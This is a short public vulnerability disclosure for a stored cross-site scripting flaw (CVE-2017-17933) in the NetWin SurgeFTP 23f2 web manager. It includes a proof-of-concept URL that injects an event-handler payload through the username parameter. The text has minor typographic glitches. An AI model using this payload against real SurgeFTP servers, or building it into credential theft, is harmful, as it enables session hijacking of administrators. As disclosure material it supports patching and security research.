# Exploit Title: Multiple stored Cross-site scripting in NetWin SurgeFTP version 23f2
# CVE: CVE-2017-17933
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>
# Vendor Homepage: http://netwinsite.com <http://netwinsite.com/>
# Category: webapps
# Attack Type: Remote
# Impact: Code execution
cgi/surgeftpmgr.cgi (aka the Web Manager interface on TCP port 7021 or 9021) in NetWin SurgeFTP version 23f2 has stored XSS via the classid, domainid, or username parameter. This is because user-supplied inputs are not sanitized. The attacker-supplied code can perform a wide variety of actions, such as stealing the victimas session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystroke.
2. Proof of Concept
http://<target IP address?/cgi/surgeftpmgr.cgi?domainid=&info=&choose_domain=win-0rlsd5c98mp&username=adminh737a%22onfocus%3d%22alert(1)%22autofocus%3d%22ib2cr&password=admin&usergroups=admin&ftpquota=admin&cmd_user_create.x=65&cmd_user_create.y=6 <http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=>
No solution available at this time.